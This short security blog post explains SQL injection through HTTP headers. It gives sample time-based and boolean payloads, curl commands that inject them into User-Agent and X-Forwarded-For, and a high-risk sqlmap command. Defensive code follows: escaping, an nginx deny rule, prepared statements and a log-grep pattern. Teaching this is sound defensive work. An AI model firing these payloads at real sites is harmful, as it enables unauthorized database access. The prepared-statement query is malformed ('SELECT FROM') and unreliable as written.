Listen to this Post
SQL Injection isn’t just limited to input parameters—attackers can exploit vulnerabilities through HTTP headers! This technique involves injecting malicious SQL payloads into headers such as:
🔹 User-Agent
🔹 Cookie
🔹 Referer
🔹 Authorization
🔹 X-Forwarded-For
A simple test payload to detect time-based SQLi:
" OR SLEEP(30)--
You Should Know: Practical Exploitation & Defense
Testing SQLi in Headers
1. Intercept HTTP Request (Burp Suite, OWASP ZAP):
sudo zaproxy
2. Modify Headers (Example with `curl`):
curl -H "User-Agent: ' OR 1=1--" http://example.com/login
3. Time-Based Detection:
curl -H "X-Forwarded-For: ' OR IF(1=1,SLEEP(5),0)--" http://example.com
Exploiting via SQLMap
Automate testing with SQLMap:
sqlmap -u http://example.com --headers="User-Agent: " --level=3 --risk=3
Defensive Measures
1. Input Sanitization:
$userAgent = mysqli_real_escape_string($conn, $_SERVER['HTTP_USER_AGENT']);
2. Web Application Firewall (WAF) Rules:
location / {
if ($http_user_agent ~ "(\'|\"|--|sleep|benchmark)") {
return 403;
}
}
3. Prepared Statements (PHP Example):
$stmt = $conn->prepare("SELECT FROM users WHERE agent = ?");
$stmt->bind_param("s", $_SERVER['HTTP_USER_AGENT']);
Log Analysis for Detection
Check suspicious logs with `grep`:
grep -E "(sleep|benchmark|union select)" /var/log/nginx/access.log
What Undercode Say
SQLi via HTTP headers is a stealthy yet dangerous attack vector often overlooked in web security assessments. Ethical hackers should rigorously test headers in bug bounty programs, while developers must implement strict input validation and WAF rules.
Expected Output:
- Vulnerability Confirmation: Delayed response (
SLEEPpayload) or unintended data leakage. - Mitigation: Proper escaping, parameterized queries, and WAF deployment.
Stay vigilant—headers are just as exploitable as form inputs!
🔗 Further Reading:
References:
Reported By: Jashim Sqlinjection – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
